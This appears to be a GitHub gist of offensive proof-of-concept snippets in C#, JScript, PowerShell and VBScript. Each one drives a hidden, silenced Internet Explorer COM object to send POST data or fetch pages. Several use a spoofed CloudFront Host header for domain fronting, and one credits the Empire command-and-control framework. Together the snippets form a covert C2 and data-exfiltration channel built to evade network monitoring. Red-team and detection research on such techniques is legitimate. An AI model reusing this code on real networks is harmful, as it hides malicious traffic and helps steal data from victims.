Skip to content

Instantly share code, notes, and snippets.

@leoloobeek

leoloobeek/ie_com.cs

Last active November 4, 2024 16:36
Show Gist options
  • Save leoloobeek/f468d34e81795239a8f8bac03646cf59 to your computer and use it in GitHub Desktop.
Save leoloobeek/f468d34e81795239a8f8bac03646cf59 to your computer and use it in GitHub Desktop.
Download ZIP
InternetExplorer.Application PoC's
Raw
ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
object URL = dst;
object flag = 14;
object empty = 0;
object pd = postData;
object headers = "";
if (customHeaders != "") {
foreach (string header in customHeaders.Split('|'))
{
headers += String.Format("{0}: {1}\r\n", header.Split(':')[0], header.Split(':')[1]);
}
}
object[] oParms = new Object[] { dst, flag, empty, pd, headers };
com_type.InvokeMember("Navigate2", System.Reflection.BindingFlags.InvokeMethod, null, IE, oParms);
while ((bool)(com_type.InvokeMember("Busy", System.Reflection.BindingFlags.GetProperty, null, IE, null)) == true)
{
System.Threading.Thread.Sleep(100);
}
object document = com_type.InvokeMember("Document", System.Reflection.BindingFlags.GetProperty, null, IE, null);
object body = document.GetType().InvokeMember("body", System.Reflection.BindingFlags.GetProperty, null, document, null);
object content = body.GetType().InvokeMember("outerHTML", System.Reflection.BindingFlags.GetProperty, null, body, null);
com_type.InvokeMember("Quit", System.Reflection.BindingFlags.InvokeMethod, null, IE, null);
return content.ToString();
}
Raw
ie_com.js
var ie_com = new ActiveXObject("InternetExplorer.Application");
ie_com.Silent = true;
ie_com.Visible = false;
var headers = "Host: <SNIP>.cloudfront.net\r\n";
ie_com.Navigate2("https://somedomain.com", 14, 0, null, headers);
while(ie_com.Busy) {
WScript.Sleep(1);
// shell = new ActiveXObject("WScript.Shell");shell.Run("ping 127.0.0.1 -n 1", 0, True); <<< if WScript object is unavailable
}
var resp = ie_com.document.body.innerHTML
ie_com.Quit();
Raw
ie_com.ps1
# some code taken from ie_com listener at https://github.com/EmpireProject/Empire
# thanks @harmj0y!
$ie_com = New-Object -ComObject InternetExplorer.Application
$ie_com.Silent = $True
$ie_com.Visible = $False
$Headers = "Host: <SNIP>.cloudfront.net`r`n"
$ie_com.Navigate2("https://somedomain.com", 14, 0, $Null, $Headers)
while($ie_com.busy -eq $true) {
Start-Sleep -Milliseconds 100
}
$html = $ie_com.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie_com.document, $Null).InnerHtml
Raw
ie_com.vbs
dim ie_com, headers, resp
Set ie_com = CreateObject("InternetExplorer.Application")
ie_com.Silent = true
ie_com.Visible = false
headers = "Host: <SNIP>.cloudfront.net" & vbCrLf
ie_com.Navigate2 "https://somedomain.com", 14, 0, null, headers
While(ie_com.busy)
WScript.Sleep 1
'CreateObject("WScript.Shell").Run "ping 127.0.0.1 -n 1", 0, True <<< if WScript object is unavailable
Wend
resp = ie_com.document.body.innerHTML
ie_com.Quit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment